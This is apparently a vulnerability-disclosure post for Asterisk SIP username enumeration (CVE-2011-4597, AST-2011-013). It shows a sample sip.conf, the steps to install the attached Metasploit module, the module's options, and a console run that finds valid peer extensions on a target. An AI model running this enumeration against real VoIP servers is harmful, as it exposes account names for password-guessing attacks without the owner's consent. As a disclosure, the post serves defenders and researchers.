A Metasploit module is attached that demonstrates how to enumerate Asterisk sip peers that have a nat setting different to the global sip nat setting as described in Asterisk Security Advisory AST-2011-013. The example below finds all peers with nat=yes, but the metasploit module will also work when global nat=yes and peers have nat=no.

Vulnerability discovered and exploit created by Ben Williams.

References:
http://downloads.asterisk.org/pub/security/AST-2011-013.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4597

Example sip.conf:

[general]
context=default
alwaysauthreject = yes

[1000]
nat=yes
type=peer
secret=12345cdsf0sd9r2e9
callerid=John Doe <1000>
host=dynamic
context=trusted

[1001]
nat=yes
secret=12345
type=peer
host=dynamic

[1002]
secret=12345a
type=peer
host=dynamic

# svn co https://www.metasploit.com/svn/framework3/trunk/
# cp enumerator_asterisk_nat_peers.rb trunk/modules/auxiliary/scanner/sip/
# cd trunk
# msfconsole

       =[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 362 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
       =[ svn r13462 updated 143 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 143 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf > use auxiliary/scanner/sip/enumerator_asterisk_nat_peers
msf auxiliary(enumerator_asterisk_nat_peers) > info

       Name: SIP Username Enumerator for Asterisk (UDP) Security Advisory AST-2011-013, CVE-2011-4597
     Module: auxiliary/scanner/sip/enumerator_asterisk_nat_peers
    Version: 1
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Ben Williams

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  BATCHSIZE  256              yes       The number of hosts to probe in each set
  CHOST                       no        The local client address
  CPORT      5070             no        The local client port
  MAXEXT     9999             yes       Ending extension
  MINEXT     0                yes       Starting extension
  PADLEN     4                yes       Cero padding maximum length
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      5060             yes       The target port
  THREADS    1                yes       The number of concurrent threads

Description:
  REGISTER scan for numeric peer usernames having a nat setting
  different to global sip nat setting. Works even when
  alwaysauthreject=yes. For this exploit to work, the source port
  cannot be 5060. For more details see Asterisk Project Security
  Advisory - AST-2011-013

msf auxiliary(enumerator_asterisk_nat_peers) > set RHOSTS 172.16.0.1
RHOSTS => 172.16.0.1
msf auxiliary(enumerator_asterisk_nat_peers) > set MINEXT 1000
MINEXT => 1000
msf auxiliary(enumerator_asterisk_nat_peers) > set MAXEXT 2000
MAXEXT => 2000
msf auxiliary(enumerator_asterisk_nat_peers) > run

[*] Found user: 1000 <sip:1000@xxxxxxxxxx> [Auth]
[*] Found user: 1001 <sip:1001@xxxxxxxxxx> [Auth]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(enumerator_asterisk_nat_peers) >
Attachment:
enumerator_asterisk_nat_peers.rb
Description: application/ruby